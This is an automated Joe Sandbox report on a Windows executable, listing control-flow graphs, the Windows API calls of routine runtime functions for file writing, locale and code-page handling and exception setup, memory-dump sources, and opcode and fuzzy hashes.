                                                                                control_flow_graph 228 ac30a7-ac30c6 229 ac30cc-ac30ce 228->229 230 ac32a0 228->230 231 ac30fa-ac3120 229->231 232 ac30d0-ac30ef call aba412 229->232 233 ac32a2-ac32a6 230->233 235 ac3126-ac312c 231->235 236 ac3122-ac3124 231->236 239 ac30f2-ac30f5 232->239 235->232 238 ac312e-ac3138 235->238 236->235 236->238 240 ac3148-ac3153 call ac2c2b 238->240 241 ac313a-ac3145 call ac3b1a 238->241 239->233 246 ac3195-ac31a7 240->246 247 ac3155-ac315a 240->247 241->240 250 ac31f8-ac3218 WriteFile 246->250 251 ac31a9-ac31af 246->251 248 ac315c-ac3160 247->248 249 ac317f-ac3193 call ac27f1 247->249 252 ac3268-ac327a 248->252 253 ac3166-ac3175 call ac2bc3 248->253 270 ac3178-ac317a 249->270 255 ac321a-ac3220 GetLastError 250->255 256 ac3223 250->256 257 ac31e6-ac31f1 call ac2ca9 251->257 258 ac31b1-ac31b4 251->258 259 ac327c-ac3282 252->259 260 ac3284-ac3296 252->260 253->270 255->256 264 ac3226-ac3231 256->264 269 ac31f6 257->269 265 ac31d4-ac31e4 call ac2e6d 258->265 266 ac31b6-ac31b9 258->266 259->230 259->260 260->239 271 ac329b-ac329e 264->271 272 ac3233-ac3238 264->272 275 ac31cf-ac31d2 265->275 266->252 273 ac31bf-ac31ca call ac2d84 266->273 269->275 270->264 271->233 276 ac323a-ac323f 272->276 277 ac3266 272->277 273->275 275->270 279 ac3258-ac3261 call abd34a 276->279 280 ac3241-ac3253 276->280 277->252 279->239 280->239
                                                                                APIs
                                                                                  • Part of subcall function 00AC27F1: GetConsoleOutputCP.KERNEL32(83CA0057,00000000,00000000,00ABBB18), ref: 00AC2854
                                                                                • WriteFile.KERNEL32(FFAC3BE8,00000000,?,00ABBA38,00000000,00000000,00000000,00000000,00ABB181,?,00ABBA38,00ABB181,00000024,00AD6648,00000010,00ABBB18), ref: 00AC3210
                                                                                • GetLastError.KERNEL32(?,00ABBA38,00ABB181,00000024,00AD6648,00000010,00ABBB18,00ABB181,?,00000000,00000004), ref: 00AC321A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ConsoleErrorFileLastOutputWrite
                                                                                • String ID:
                                                                                • API String ID: 2915228174-0
                                                                                • Opcode ID: 783065a2bdd3e143be1f58beeeaacff97e832e21bfed2c1127f6180fef3a351c
                                                                                • Instruction ID: 6fa3ad4532657490739089355b06da98fd0240357b6f69c5f166cea33352d330
                                                                                • Opcode Fuzzy Hash: 783065a2bdd3e143be1f58beeeaacff97e832e21bfed2c1127f6180fef3a351c
                                                                                • Instruction Fuzzy Hash: 8A619472D04249AFDF11CFA8C845FEEBFB9AF19304F168149E804A7252D771DA05CB60

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 283 ac6572-ac659a call ac60a2 286 ac65a0-ac65a6 283->286 287 ac6762-ac6763 call ac6113 283->287 289 ac65a9-ac65af 286->289 290 ac6768-ac676a 287->290 291 ac65b5-ac65c1 289->291 292 ac66b1-ac66d0 call ab7420 289->292 295 ac676b-ac6779 call ab5a66 290->295 291->289 293 ac65c3-ac65c9 291->293 301 ac66d3-ac66d8 292->301 296 ac65cf-ac65db IsValidCodePage 293->296 297 ac66a9-ac66ac 293->297 296->297 300 ac65e1-ac65e8 296->300 297->295 303 ac65ea-ac65f6 300->303 304 ac6610-ac661d GetCPInfo 300->304 305 ac66da-ac66df 301->305 306 ac6715-ac671f 301->306 307 ac65fa-ac6606 call ac6176 303->307 309 ac669d-ac66a3 304->309 310 ac661f-ac663e call ab7420 304->310 311 ac66e1-ac66e9 305->311 312 ac6712 305->312 306->301 308 ac6721-ac674b call ac6064 306->308 318 ac660b 307->318 323 ac674c-ac675b 308->323 309->287 309->297 310->307 324 ac6640-ac6647 310->324 316 ac670a-ac6710 311->316 317 ac66eb-ac66ee 311->317 312->306 316->305 316->312 321 ac66f0-ac66f6 317->321 318->290 321->316 322 ac66f8-ac6708 321->322 322->316 322->321 323->323 325 ac675d 323->325 326 ac6649-ac664e 324->326 327 ac6673-ac6676 324->327 325->287 326->327 329 ac6650-ac6658 326->329 328 ac667b-ac6682 327->328 328->328 330 ac6684-ac6698 call ac6064 328->330 331 ac665a-ac6661 329->331 332 ac666b-ac6671 329->332 330->307 334 ac6662-ac6669 331->334 332->326 332->327 334->332 334->334
                                                                                APIs
                                                                                  • Part of subcall function 00AC60A2: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 00AC60CD
                                                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00AC63B9,?,00000000,?,00000000,?), ref: 00AC65D3
                                                                                • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00AC63B9,?,00000000,?,00000000,?), ref: 00AC6615
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CodeInfoPageValid
                                                                                • String ID:
                                                                                • API String ID: 546120528-0
                                                                                • Opcode ID: 4f47219e532e8e275f21b727f76a488eba79bf3c7a4250408523e9cdf9dd0244
                                                                                • Instruction ID: 205f5b7b3840482ad71980cbaff4955a5f5a123b4349a7f9a1bd8cc29d111734
                                                                                • Opcode Fuzzy Hash: 4f47219e532e8e275f21b727f76a488eba79bf3c7a4250408523e9cdf9dd0244
                                                                                • Instruction Fuzzy Hash: 8A515474A003059EDB24CF35C881FAABBF5EF85304F1A896ED0868B252E774D942CB90

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 336 ab46a8-ab46c8 337 ab46ca-ab46d1 call ab468e 336->337 338 ab46d3-ab46da 336->338 347 ab4728-ab4736 call ab5a66 337->347 340 ab46fc-ab4700 338->340 341 ab46dc-ab46e6 338->341 342 ab4702-ab4711 call ab4133 340->342 343 ab4725 340->343 341->340 345 ab46e8-ab46fa 341->345 350 ab4739-ab476e 342->350 351 ab4713-ab4717 call ab34f5 342->351 343->347 345->347 358 ab4770-ab4773 350->358 359 ab4794-ab479c 350->359 354 ab471c-ab4720 351->354 354->343 356 ab4722 354->356 356->343 358->359 360 ab4775-ab4779 358->360 361 ab479e-ab47af call abc658 359->361 362 ab47b5-ab47bf 359->362 360->343 363 ab477b-ab478a call ab34f5 360->363 361->343 361->362 362->343 365 ab47c5-ab47c8 362->365 363->343 369 ab478c-ab4792 363->369 365->347 369->343
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Fputc
                                                                                • String ID:
                                                                                • API String ID: 3078413507-0
                                                                                • Opcode ID: 46ce93722b27fb6fac74b816a00c049a0df938880db08887d7f673c7beaf915f
                                                                                • Instruction ID: ae9752041be2026bf2caeb9521470b479c2d666e0a2e15b85958c0d33ed535cf
                                                                                • Opcode Fuzzy Hash: 46ce93722b27fb6fac74b816a00c049a0df938880db08887d7f673c7beaf915f
                                                                                • Instruction Fuzzy Hash: C2416E3690021AABCF14DF68D5809EDB7BCFF0E351B144156E441A7A42EF31ED95CB90

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 370 ac2ca9-ac2cfe call ab67d0 373 ac2d00 370->373 374 ac2d73-ac2d83 call ab5a66 370->374 376 ac2d06 373->376 377 ac2d0c-ac2d0e 376->377 379 ac2d28-ac2d4d WriteFile 377->379 380 ac2d10-ac2d15 377->380 383 ac2d4f-ac2d5a 379->383 384 ac2d6b-ac2d71 GetLastError 379->384 381 ac2d1e-ac2d26 380->381 382 ac2d17-ac2d1d 380->382 381->377 381->379 382->381 383->374 385 ac2d5c-ac2d67 383->385 384->374 385->376 386 ac2d69 385->386 386->374
                                                                                APIs
                                                                                • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,00ABBB18,?,00AC31F6,?,00000000,00000000,?,00000000,00000000), ref: 00AC2D45
                                                                                • GetLastError.KERNEL32(?,00AC31F6,?,00000000,00000000,?,00000000,00000000,00000000,00ABB181,?,00ABBA38,00ABB181,00000024,00AD6648,00000010), ref: 00AC2D6B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID:
                                                                                • API String ID: 442123175-0
                                                                                • Opcode ID: 6aeed32510658ac4f4ecf6b47b4bfcd57a6e7d36cf496df3a249d480f5c248fb
                                                                                • Instruction ID: 33e4d166a252d2c16d2ca65737ef811c8455d6d9f91b41627ff4b9dd5c3bd6df
                                                                                • Opcode Fuzzy Hash: 6aeed32510658ac4f4ecf6b47b4bfcd57a6e7d36cf496df3a249d480f5c248fb
                                                                                • Instruction Fuzzy Hash: AF218034A002199BCB16CF29DC80BD9B7B9EB59305F1541ADE906E7251D630DE82CBA4

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 387 ac1851-ac1856 388 ac1858-ac1870 387->388 389 ac187e-ac1887 388->389 390 ac1872-ac1876 388->390 392 ac1899 389->392 393 ac1889-ac188c 389->393 390->389 391 ac1878-ac187c 390->391 395 ac18f3-ac18f7 391->395 394 ac189b-ac18a8 GetStdHandle 392->394 396 ac188e-ac1893 393->396 397 ac1895-ac1897 393->397 398 ac18aa-ac18ac 394->398 399 ac18d5-ac18e7 394->399 395->388 400 ac18fd-ac1900 395->400 396->394 397->394 398->399 401 ac18ae-ac18b7 GetFileType 398->401 399->395 402 ac18e9-ac18ec 399->402 401->399 403 ac18b9-ac18c2 401->403 402->395 404 ac18ca-ac18cd 403->404 405 ac18c4-ac18c8 403->405 404->395 406 ac18cf-ac18d3 404->406 405->395 406->395
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00AC189D
                                                                                • GetFileType.KERNELBASE(00000000), ref: 00AC18AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileHandleType
                                                                                • String ID:
                                                                                • API String ID: 3000768030-0

                                                                                APIs
                                                                                • GetLastError.KERNEL32(00AD65C8,0000000C), ref: 00ABAF8C
                                                                                • ExitThread.KERNEL32 ref: 00ABAF93
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ErrorExitLastThread
                                                                                • String ID:
                                                                                • API String ID: 1611280651-0
                                                                                APIs
                                                                                • LCMapStringEx.KERNELBASE(?,00AC47E4,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00AC11E6
                                                                                • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00AC47E4,?,?,00000000,?,00000000), ref: 00AC1204
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: String
                                                                                • String ID:
                                                                                • API String ID: 2568140703-0
                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(E8458D00,?,00AC63C5,00AC63B9,00000000), ref: 00AC61A8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Info
                                                                                • String ID:
                                                                                • API String ID: 1807457897-0
                                                                                APIs
                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,00AC9177,00000002,00000000,?,?,?,00AC9177,?,00000000), ref: 00AC8EF2
                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,00AC9177,00000002,00000000,?,?,?,00AC9177,?,00000000), ref: 00AC8F1B
                                                                                • GetACP.KERNEL32(?,?,00AC9177,?,00000000), ref: 00AC8F30
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID: ACP$OCP
                                                                                • API String ID: 2299586839-711371036
                                                                                APIs
                                                                                  • Part of subcall function 00AC0590: GetLastError.KERNEL32(?,?,00ABAF9E,00AD65C8,0000000C), ref: 00AC0594
                                                                                  • Part of subcall function 00AC0590: SetLastError.KERNEL32(00000000), ref: 00AC0636
                                                                                • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00AC913A
                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 00AC9183
                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00AC9192
                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00AC91DA
                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00AC91F9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                • String ID:
                                                                                • API String ID: 415426439-0
                                                                                APIs
                                                                                  • Part of subcall function 00AC0590: GetLastError.KERNEL32(?,?,00ABAF9E,00AD65C8,0000000C), ref: 00AC0594
                                                                                  • Part of subcall function 00AC0590: SetLastError.KERNEL32(00000000), ref: 00AC0636
                                                                                • GetACP.KERNEL32(?,?,?,?,?,?,00ABECBF,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00AC878B
                                                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00ABECBF,?,?,?,00000055,?,-00000050,?,?), ref: 00AC87B6
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00AC8919
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                • String ID: utf8
                                                                                • API String ID: 607553120-905460609
                                                                                APIs
                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00AB6555
                                                                                • IsDebuggerPresent.KERNEL32 ref: 00AB6621
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00AB663A
                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00AB6644
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                • String ID:
                                                                                • API String ID: 254469556-0
                                                                                APIs
                                                                                  • Part of subcall function 00AC0590: GetLastError.KERNEL32(?,?,00ABAF9E,00AD65C8,0000000C), ref: 00AC0594
                                                                                  • Part of subcall function 00AC0590: SetLastError.KERNEL32(00000000), ref: 00AC0636
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00AC8B31
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00AC8B7B
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00AC8C41
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InfoLocale$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 661929714-0
                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00ABA38B
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00ABA395
                                                                                • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00ABA3A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                • String ID:
                                                                                • API String ID: 3906539128-0
                                                                                • Opcode ID: 73e59bc9ed215675f0fa69266ac1b9e9b9cda98022292e5a729302855abe6bbe
                                                                                • Instruction ID: e51350c9f8e753eb031588917bd94f43edfa089f9bf13208dbf35ffdd5c55dc8
                                                                                • Opcode Fuzzy Hash: 73e59bc9ed215675f0fa69266ac1b9e9b9cda98022292e5a729302855abe6bbe
                                                                                • Instruction Fuzzy Hash: 7931B3759012189BCB21DF64DD89BCCBBB8BF18310F5041EAE41CA7261EB749F858F55
                                                                                APIs
                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,00AC4D2A,?,?,?,?,?,?,00000000), ref: 00AC4F5C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionRaise
                                                                                • String ID:
                                                                                • API String ID: 3997070919-0
                                                                                • Opcode ID: f3215220a8a70031edc630999ddaf16295a4fd7db58b9c730f4c48d7442c8d94
                                                                                • Instruction ID: 4bba3418c1414eb1837285af1b8c227ca964dea6aa81e1d01632b957f4c654c0
                                                                                • Opcode Fuzzy Hash: f3215220a8a70031edc630999ddaf16295a4fd7db58b9c730f4c48d7442c8d94
                                                                                • Instruction Fuzzy Hash: A8B12631610608DFDB15CF28C496FA57BA0FF49365F2A865CE89ACF2A1C335E991CB44
                                                                                APIs
                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00AB6042
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FeaturePresentProcessor
                                                                                • String ID:
                                                                                • API String ID: 2325560087-0
                                                                                • Opcode ID: bd7fbac3d503311af0665ccc804c305a3e225c01830856b3a9eb24b64017257b
                                                                                • Instruction ID: ab4a1e4ca40a8b12fea3dac2c7d04639cfb2a9e4120f6da8e2e16b3d8c1c4e63
                                                                                • Opcode Fuzzy Hash: bd7fbac3d503311af0665ccc804c305a3e225c01830856b3a9eb24b64017257b
                                                                                • Instruction Fuzzy Hash: 0B516EB1A103198FDB14CF59E981BAABBF8FB58314F14C52AD501EB2A2E7799900CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 784659f6547996c3ab50688cf54613e83d5b42e2e542c9c7576a6aec87f3c777
                                                                                • Instruction ID: 1d3c7989f76ba4d97fafd2022df75a94a709e6afe1d589810e9575e750f9f87f
                                                                                • Opcode Fuzzy Hash: 784659f6547996c3ab50688cf54613e83d5b42e2e542c9c7576a6aec87f3c777
                                                                                • Instruction Fuzzy Hash: C741A275C04619AEDB10DF79CC89EAABBB8EB45300F1542DDF449D3201EA31AE848F10
                                                                                APIs
                                                                                  • Part of subcall function 00AC0590: GetLastError.KERNEL32(?,?,00ABAF9E,00AD65C8,0000000C), ref: 00AC0594
                                                                                  • Part of subcall function 00AC0590: SetLastError.KERNEL32(00000000), ref: 00AC0636
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00AC8D84
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 3736152602-0
                                                                                • Opcode ID: 65a504d36fa8c8b6b5a120bcc9d500e1edef4bd58bafca6a58acf93aa2ed85ed
                                                                                • Instruction ID: e647b803b4ae0205d973e267f617e622abd2d500114e2d42635b0cb3929f05f4
                                                                                • Opcode Fuzzy Hash: 65a504d36fa8c8b6b5a120bcc9d500e1edef4bd58bafca6a58acf93aa2ed85ed
                                                                                • Instruction Fuzzy Hash: 62217F32A11206ABDB29AB24DD41FBA73A9FF65311F12407EF906D6181EF78E9418B50
                                                                                APIs
                                                                                  • Part of subcall function 00AC0590: GetLastError.KERNEL32(?,?,00ABAF9E,00AD65C8,0000000C), ref: 00AC0594
                                                                                  • Part of subcall function 00AC0590: SetLastError.KERNEL32(00000000), ref: 00AC0636
                                                                                • EnumSystemLocalesW.KERNEL32(00AC8ADD,00000001,00000000,?,-00000050,?,00AC910E,00000000,?,?,?,00000055,?), ref: 00AC8A29
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                • String ID:
                                                                                • API String ID: 2417226690-0
                                                                                • Opcode ID: cb9605de1a596a1a8b90e099ebbe1b920525593aa9c8e130ae53f2ae956bfdc2
                                                                                • Instruction ID: dd8f1072837c5af5688e069c390df90667db2a7e692b83ab09ca0b174053f047
                                                                                • Opcode Fuzzy Hash: cb9605de1a596a1a8b90e099ebbe1b920525593aa9c8e130ae53f2ae956bfdc2
                                                                                • Instruction Fuzzy Hash: 8A110C372007059FDB18DF39C891A7AB791FF84359B16442EE94687B40D775B943C740
                                                                                APIs
                                                                                  • Part of subcall function 00AC0590: GetLastError.KERNEL32(?,?,00ABAF9E,00AD65C8,0000000C), ref: 00AC0594
                                                                                  • Part of subcall function 00AC0590: SetLastError.KERNEL32(00000000), ref: 00AC0636
                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00AC8CF9,00000000,00000000,?), ref: 00AC8F8B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
